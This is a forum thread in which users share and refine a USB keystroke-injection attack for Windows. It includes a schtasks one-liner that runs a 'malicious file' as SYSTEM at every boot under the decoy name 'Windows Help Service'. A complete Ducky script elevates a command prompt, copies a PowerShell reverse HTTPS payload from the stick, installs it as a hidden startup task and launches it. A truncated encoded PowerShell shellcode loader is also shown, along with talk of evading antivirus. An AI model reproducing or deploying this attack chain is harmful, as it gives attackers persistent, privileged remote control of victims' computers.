ThoughtfulDev Posted March 25, 2017 Share Posted March 25, 2017 Hey, i just found a method to start your malicious msf/or whatever payload as SYSTEM user from boot. This little shell line (shell needs to be run as administrator): schtasks /create /tn "Windows Help Service" /tr C:\maliciousfile.exe /sc onstart /ru SYSTEM /F creates a Task named "Windows Help Service" which runs C:\maliciousfile.exe every startup as SYSTEM user. Keep in mind that when using this as a payload you may need to escape the / and \ and ".I'm currently working on a C++ Version of PSExec (Source) to get rid of the .Net Framework. Feel free to post your Payload using the simple onliner which starts your malicious file as System every boot :) Quote Link to comment Share on other sites More sharing options...
Decoy Posted March 25, 2017 Share Posted March 25, 2017 3 hours ago, Shonenx333 said: Hey, i just found a method to start your malicious msf/or whatever payload as SYSTEM user from boot. This little shell line (shell needs to be run as administrator): schtasks /create /tn "Windows Help Service" /tr C:\maliciousfile.exe /sc onstart /ru SYSTEM /F creates a Task named "Windows Help Service" which runs C:\maliciousfile.exe every startup as SYSTEM user. Keep in mind that when using this as a payload you may need to escape the / and \ and ".I'm currently working on a C++ Version of PSExec (Source) to get rid of the .Net Framework. Feel free to post your Payload using the simple onliner which starts your malicious file as System every boot :) This might work great with the Bunny or Twin Duck. Can this be done with PowerShell? Quote Link to comment Share on other sites More sharing options...
ThoughtfulDev Posted March 26, 2017 Author Share Posted March 26, 2017 19 hours ago, Decoy said: This might work great with the Bunny or Twin Duck. Can this be done with PowerShell? I dont't see any reason why it couldn't. You just need a for example powershell reverse https payload which will then be started insted of the maliciousfile.exe. I might make a payload tomorrow or so, but feel free to experiment :) Quote Link to comment Share on other sites More sharing options...
henna3 Posted March 27, 2017 Share Posted March 27, 2017 19 hours ago, Shonenx333 said: I dont't see any reason why it couldn't. You just need a for example powershell reverse https payload which will then be started insted of the maliciousfile.exe. I might make a payload tomorrow or so, but feel free to experiment :) Cant wait! Quote Link to comment Share on other sites More sharing options...
chaz Posted March 27, 2017 Share Posted March 27, 2017 Well done for working on this, I have made a native (C) version of PSExec (my project) but it's detected by 1 Anti-Virus. Quote Link to comment Share on other sites More sharing options...
ThoughtfulDev Posted March 27, 2017 Author Share Posted March 27, 2017 5 hours ago, henna3 said: Cant wait! I havent done much today maybe this week... sry 2 hours ago, chaz said: Well done for working on this, I have made a native (C) version of PSExec (my project) but it's detected by 1 Anti-Virus. Nice :) my c++ version currently has 0 / 61 so far so good... But i need to include the c++ runtimes dlls files(currently 2 as well) which is not a big deal but...mehh :D I will try making a pure powershell version of this since it can all be done by using bash (file copying, the windows task, and a powershell reverse payload) Quote Link to comment Share on other sites More sharing options...
Decoy Posted March 27, 2017 Share Posted March 27, 2017 3 hours ago, chaz said: Well done for working on this, I have made a native (C) version of PSExec (my project) but it's detected by 1 Anti-Virus. Why did it get picked up by AV? Quote Link to comment Share on other sites More sharing options...
ThoughtfulDev Posted March 29, 2017 Author Share Posted March 29, 2017 Hey i'm done with the batch version of that.. but without the check if the user can actually run cmd as admin without entering a password :( DELAY 5000 GUI R DELAY 500 STRING powershell -c start -verb runas cmd ENTER DELAY 1500 ALT y DELAY 1000 STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do copy %a\powershell_reverse_https.bat %cd%\ps.bat ENTER DELAY 500 STRING schtasks /create /tn "Windows Help Service" /tr %cd%\ps.bat /sc onstart /ru SYSTEM /F ENTER DELAY 250 STRING start /min %cd%\ps.bat ENTER DELAY 200 STRING exit ENTER i just copys your generic powershell payload found in the ducky root named powershell_reverse_https.bat that looks like this: powershell -nop -window hidden -noni -EncodedCommand JABrAEYASQAgAD0AIAAnACQAVwBMAHIAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAVwBMAHIAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQB... to the current working directory which by default if cmd is run as admin is C:\Windows\System32 or whatever drive letter you have. it then adds the powershell payload to run as a system task at startup as a SYSTEM user. I also got a binary version of PSExec in cpp which takes much longer to startup from the sdcard (up to 6 seconds)... but it checks if the user can even run programs as admin without having to enter the admin password. This payload right here should be finished within 6 seconds or sth :) Have fun Quote Link to comment Share on other sites More sharing options...
henna3 Posted March 29, 2017 Share Posted March 29, 2017 (edited) 1 hour ago, Shonenx333 said: Hey i'm done with the batch version of that.. but without the check if the user can actually run cmd as admin without entering a password :( DELAY 5000 GUI R DELAY 500 STRING powershell -c start -verb runas cmd ENTER DELAY 1500 ALT y DELAY 1000 STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do copy %a\powershell_reverse_https.bat %cd%\ps.bat ENTER DELAY 500 STRING schtasks /create /tn "Windows Help Service" /tr %cd%\ps.bat /sc onstart /ru SYSTEM /F ENTER DELAY 250 STRING start /min %cd%\ps.bat ENTER DELAY 200 STRING exit ENTER i just copys your generic powershell payload found in the ducky root named powershell_reverse_https.bat that looks like this: powershell -nop -window hidden -noni -EncodedCommand JABrAEYASQAgAD0AIAAnACQAVwBMAHIAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAVwBMAHIAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQB... to the current working directory which by default if cmd is run as admin is C:\Windows\System32 or whatever drive letter you have. it then adds the powershell payload to run as a system task at startup as a SYSTEM user. I also got a binary version of PSExec in cpp which takes much longer to startup from the sdcard (up to 6 seconds)... but it checks if the user can even run programs as admin without having to enter the admin password. This payload right here should be finished within 6 seconds or sth :) Have fun For some reason the file wont start at startup. I have tested with notepad.exe and another native exe file. Is there a reason for this? Thanks Edited March 29, 2017 by henna3 Quote Link to comment Share on other sites More sharing options...
ThoughtfulDev Posted March 31, 2017 Author Share Posted March 31, 2017 On 29.3.2017 at 5:58 PM, henna3 said: For some reason the file wont start at startup. I have tested with notepad.exe and another native exe file. Is there a reason for this? Thanks Have a look into your Windows Task Scheduler. Search for "Windows Help Service" and make sure that the path under "Actions" is the correct path to your executable. If the task isn't even created than try to execute the schtasks line manually in a command prompt started as admin and have a look at the output (replace %cd%\ps.bat by something using notepad) Hope this helps. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.